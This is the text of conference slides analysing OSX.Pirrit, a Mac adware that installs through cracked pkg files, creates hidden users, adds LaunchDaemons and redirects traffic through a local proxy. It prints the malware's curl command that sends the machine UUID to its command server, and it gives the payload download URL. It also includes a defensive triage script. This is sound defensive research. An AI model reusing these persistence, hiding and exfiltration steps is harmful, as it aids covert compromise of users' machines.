OSX/Pirrit: The blue balls of OS X adware
Page 1
© 2016 Cybereason Inc. All rights reserved.
OSX.Pirrit: The blue balls of OS X adware
Page 2
$ whoami
• Amit Serper (What’s with the weird name, dude?)
• Lead OS X and Linux security researcher @ Cybereason
• Low level research (Kernel, reversing, etc...)
• Writing poorly programmed attack simulation tools (crappy coder)
• Malware research
• HackingTeam server research (with @awfrazer):
  • Slides: http://hackedteam.lol
  • Paper: http://ht-paper.amit.wtf
  • Blogs: http://ht1.amit.wtf, http://ht2.amit.wtf
• Lead security researcher @ Israeli government agency (9 years)
• <REDACTED>
• Follow me on twitter: @0xAmit
Page 3
$ cat /etc/motd
Page 4
$ cat /etc/motd
Page 5
$ cat /Users/amit/agenda.txt
This talk is based on my blog post on objective-see.com. See direct link: http://pirrit.amit.wtf
Page 6
$ cat /Users/amit/agenda.txt
1. For those that weren’t around 15 years ago: Intro to adware
2. This apple is getting ripe: Adware on Mac
3. The blue balls: OSX.Pirrit
Page 7
Intro to Adware
• Adware usually gets to your machine with installers.
• These installers install a program that you downloaded and then offer to add some other program that will enhance your experience
Page 8
Intro to Adware
1. Software that resides on one’s machine and displays ads
2. Adware divides into several categories:
   A. Plain and stupid – Just displays popups without any context
   B. The “norm” – Displays banners (and rarely popups) according to basic metrics that are gathered from the browser
   C. The black-ops operative – Installs a hidden program that can see your entire traffic, injects ads into pages you visit and even overrides legitimate ads that were put there in the first place (That’s stealing!)
Page 9
Adware on the Mac
1. Similar to Windows, adware for OS X usually comes in the form of toolbars
2. These toolbars are Safari plugins – like Spigot…
http://www.thesafemac.com/arg-spigot
Page 10
Adware on the Mac
1. Similar to Windows, adware for OS X usually comes in the form of toolbars
2. These toolbars are Safari plugins – like Spigot…
3. Spigot also installs LaunchAgents!
http://www.thesafemac.com/arg-spigot
Page 11
The story begins…
• An IRC user “Xiano” popped into #osxre @ freenode and told us that his friend’s Mac is acting weird
• He said that internet browsing is rather slow and some weird processes are showing up.
• He then shared with us a weird executable called “sizzling”.
• Another channel member, “Paraxor”, started reversing that executable and quoted some function names
• It was immediately clear that this is some sort of adware because of these strings
Page 12
No, seriously you guys…
Page 13
Qt?
• Qt (pronounced cute) is a cross-platform application development framework
• Allows a developer to maintain a single codebase for an application that will run on Windows, Linux, Mac and other platforms…
• The “cost” of that is a lot of external libraries that are linked with your application
Page 14
The story begins… (continued)
http://forums.macrumors.com/threads/what-is-unillumination-process-mavericks.1966015/
Page 15
Page 16
Page 17
Page 18
Let’s look at the binary (strings table)
Page 19
Another URL in the strings table
Page 20
Let’s google that url…
http://shorte.st/st/2904deaf2db062b776f39f499bf88ad9/%1
Gives one result: a JoeSandbox analysis of a Windows PE executable
Page 21
Shorte.st – URL shortening service
Page 22
Let’s google that…
Page 23
Let’s look at the script – rec_script.sh
Page 24
Windows is easy…
Page 25
But removal instructions for mac?
Page 26
Xiano was back with more…
• He found an app bundle called “DemoUpdater” on his friend’s machine.
• He mentioned that this app bundle was running under a different user which he did not know.
• Inside the app bundle was an x64 Mach-O binary executable and a shell script called Update2.sh.
• This was far more interesting.
Page 27
In the executable - Suspicious functions and strings galore!
Page 28
Mysterious domains
*.93a555685cc7443a8e1034efa1f18924.com *.aa625d84f1587749c1ab011d6f269f7d64.com *.2ff328dcee054f2f9a9a5d7e966e3ec0.com *.aae219721390264a73aa60a5e6ab6ccc4e.com
Page 29
And also… Some more windows crap
Page 30
But what about that update2 shell script?
• When the executable finishes running, it executes Update2.sh
• It’s a HUGE script (330 lines) – it even has some inline Python code (python -c)
• Gets the machine UUID via the command line (ioreg, parsing its huge output with awk and grep)
• Sends the machine ID to a server in order to get a new ID back from the server, by issuing a curl command:
  curl "http://93a555685cc7443a8e1034efa1f18924.com/v/cld?mid=<UUID>&ct=pd"
• It validates your geolocation by curl’ing ipinfo.io/country and checks that you are from the US, UK, Spain, Australia, France, Germany, India, Italy, Netherlands or New Zealand in order to download a different “ad package”.
• It then updates the C&C, telling it that the installation was successful, using the UUID as an identifier.
• After the C&C has been notified, the script downloads and installs another program called “DemoInjector”
Page 31
So here’s what we know until now
• It’s an adware
• It generates traffic
• It’s cross-platform
• It’s definitely trying to hide strings and domains inside the binary
• It adds a hidden user with a weird name – it has to get root access
• It runs weird processes with strange names
• It has a component called “DemoUpdater”
Page 32
But here’s what no one knows
How the hell did people get infected?!
Page 33
FLASH SIDEWAYS!
Page 34
FLASH SIDEWAYS!
Page 35
PKG file?
• Mac equivalent of the MSI (Installer file)
• An extensible archive format (XAR)
• Has a nice wizard with useful EULA messages
• Can be signed with a developer certificate
• Has the ability to run pre/post install scripts!
Page 36
PKG file!
• Pkg files are a very convenient way to drop malware
• You can codesign them
• And you can just use the scripting features to do whatever you want to.
Page 37
PKG file – Suspicious package
http://www.mothersruin.com/software/SuspiciousPackage/
Page 38
PKG file – Suspicious package
Page 39
Let’s look at this script
Page 40
Entire process
1. User downloads crack
2. Gets pkg
3. Pre-install script runs
4. Script downloads “DemoUpdater” component
5. DemoUpdater prepares the infrastructure for DemoInjector
6. Profit!
Page 41
DemoUpdater
• DemoUpdater is the first component that’s actually being installed by Pirrit.
• This is the component that lays the groundwork for the traffic hijacking proxy
• This is the script that generates the strange names
• After a random name is generated, it is written to com.common.plist
• It then creates another plist to hold its preferences. That plist is created with a random name on each install (com.<RANDOMWORD>.preferences.plist)
Page 42
DemoUpdater
• The script then carries on with creating the DemoUpdater bundle and executable, while not forgetting to change its name to make detection harder
• It then downloads the next component, DemoInjector, and adds a LaunchDaemon for it.
Page 43
Wait… LaunchDaemons?
• A LaunchDaemon is an autorun in Mac speak
• It loads when the computer boots
• And just like everything in OS X, it’s also stored in a plist file
Page 44
The soil is ready… Now – plant the seed
• After all of the basic building blocks were laid, it is time for the main event
• We have a random name generated for DemoUpdater
• We have an autorun set up for DemoUpdater
• Now it’s time to get the proxy and get crackin’!
• The proxy is DemoInjector (remember it from before?)
• It will be downloaded from:
  http://93a555685cc7443a8e1034efa1f18924.com/static/pd_files/dit3.tgz
• The number in the tgz file name is incremental – each one is a different version
• The latest version of DemoInjector is dit8 and it is from April 10th 2016.
Page 45
The soil is ready… Now – plant the seed
• The proxy is called DemoInjector.
• It is also a Qt project.
• It also has a lot of shell scripts!
• The most interesting one is install_injector.sh
• It also generates a random company name and executable name
• And it creates a hidden user!
Page 46
A hidden user… Oh my!
Page 47
Hide500Users?
Page 48
Someone was reading Apple documentation
https://support.apple.com/en-il/HT203998
Page 49
Someone was reading Apple documentation
Page 50
Another LaunchDaemon, this time for DemoInjector
Page 51
And now – Traffic redirection!
• DemoInjector is listening on 127.0.0.1:9882
• All of the packets that are generated by everyone but $HIDDEN_USERS are forwarded to DemoInjector using pf
• These settings also exist in another file that is dropped by the installer, called /etc/change_net_settings. There’s also a LaunchDaemon for that!
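A triage helper, added here as an example (it is not the author's removal script), that turns the indicators from the last few slides into checks: the hidden account with a UID below 500, the pf rdr rules steering other users' traffic into DemoInjector on 127.0.0.1:9882, and the randomly labelled LaunchDaemon that runs /etc/change_net_settings. Each function reads captured command output so it can be exercised offline; the sample account names and pf rules are constructed, and the pfctl rule layout is assumed from standard pf syntax.

```shell
#!/bin/sh
# Pirrit triage helpers (added example, not the author's removal script).
# Each function reads captured text on stdin or a directory argument, so it
# can be exercised offline; the live command to feed it is named in comments.

# Accounts with a UID below 500 are hidden by the Hide500Users loginwindow
# setting that the installer relies on. Apple's own service accounts sit there
# too but are prefixed with "_", so anything else deserves a look.
# Live input:  dscl . -list /Users UniqueID
find_hidden_users() {
    awk '$2 ~ /^[0-9]+$/ && $2 < 500 && $1 !~ /^_/ &&
         $1 != "root" && $1 != "daemon" { print $1, $2 }'
}

# DemoInjector listens on 127.0.0.1:9882 and pf "rdr" rules steer everyone
# else's traffic into it. Print rdr rules whose target is loopback on that
# port ($1 overrides the port if a sample uses a different one).
# Live input:  sudo pfctl -s nat
find_pf_redirects() {
    awk -v port="${1:-9882}" \
        'NF >= 3 && $1 == "rdr" && $(NF-2) == "127.0.0.1" &&
         $(NF-1) == "port" && $NF == port { print }'
}

# The LaunchDaemons for DemoUpdater, DemoInjector and /etc/change_net_settings
# carry random labels, so search the plists by what they execute, not by name.
# Live use:  find_daemons_running /Library/LaunchDaemons /etc/change_net_settings
find_daemons_running() {
    grep -l -- "$2" "$1"/*.plist 2>/dev/null || true
}

# Constructed sample data (not captured from an infected machine) for a dry run.
SAMPLE_USERS='root 0
daemon 1
_spotlight 89
nobody -2
amit 501
dftqxw 499'
SAMPLE_PF='nat on en0 inet from 192.168.1.0/24 to any -> (en0)
rdr pass on en0 inet proto tcp from any to any port = 80 -> 127.0.0.1 port 9882
rdr pass on en0 inet proto tcp from any to any port = 443 -> 127.0.0.1 port 9882
rdr on lo0 inet proto tcp from any to any port = 8080 -> 127.0.0.1 port 80'

if [ "${1:-}" = "--live" ]; then
    # On a real host (root needed for pfctl):  sudo sh pirrit_triage.sh --live
    dscl . -list /Users UniqueID | find_hidden_users
    pfctl -s nat | find_pf_redirects
    find_daemons_running /Library/LaunchDaemons /etc/change_net_settings
    [ -f /etc/change_net_settings ] && echo "/etc/change_net_settings present"
else
    echo "== hidden non-Apple accounts (sample) =="
    printf '%s\n' "$SAMPLE_USERS" | find_hidden_users
    echo "== pf redirects into 127.0.0.1:9882 (sample) =="
    printf '%s\n' "$SAMPLE_PF" | find_pf_redirects
fi
```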
Page 52
Aaaaand… Profit!
Page 53
Droppers… Droppers everywhere!
Page 54
I created a small removal script
http://github.com/aserper
Some people had problems with it…
Page 55
Conclusion
Page 56
THANKS !
1. PATRICK WARDLE / OBJECTIVE-SEE.COM / @PATRICKWARDLE
2. DATAGRAM – FOR THE AWESOME HOSPITALITY
3. My pals from Cybereason for the moral support (and for picking up the check)
4. @VISS
5. YOU!
Page 57
THANKS !
Come see me popping shells @ fail of things right after this!
Page 58
Thank you.